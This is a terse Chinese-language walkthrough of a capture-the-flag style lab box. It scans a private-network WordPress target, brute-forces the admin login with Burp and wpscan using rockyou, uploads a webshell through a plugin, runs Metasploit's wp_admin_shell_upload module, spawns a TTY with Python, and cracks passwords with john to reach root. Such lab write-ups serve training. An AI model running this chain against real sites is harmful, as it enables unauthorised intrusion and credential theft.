nmap扫描搜索靶机IP
nmap -sP 192.168.56.0/24
扫描搜索靶机开放端口
nmap -p -A 192.168.56.104
只开放了 80端口 进去看看
发现是 wordpress 搭建的CMS
看看能不能扫到后台
python3 dirsearch.py -u "http://192.168.56.104" -e php
访问 http://192.168.56.104/wp-login.php 找到wordpress后台
burpsuite爆破 admin/qwerty
(这里可以有kali 自带的 wpscan 这是专门扫描 wordpress 漏洞的黑盒测试器)
wpscan --url http://192.168.56.104/wp-login.php --usernames admin --passwords /usr/share/wordlists/rockyou.txt
成功进入后台
在插件中上传我们的一句话木马
接着使用 msfconsole来提权
msfconsole search wordpress shell use exploit/unix/webapp/wp_admin_shell_upload options set username admin set password qwerty set rhost 192.168.56.104 run
接着 python3 提权到 tty
shell python3 -c "import pty;pty.spawn('/bin/bash')"
查看 www 下的 wp-config.php 文件
接着利用 john 解密
john pass.txt john --show pass.txt
得到 root 权限 root/jasmine
备注,这里有师傅说 第一种提权可能会简单点:
https://www.cnblogs.com/ssw6/p/12668000.html
https://blog.csdn.net/zz_Caleb/article/details/88539227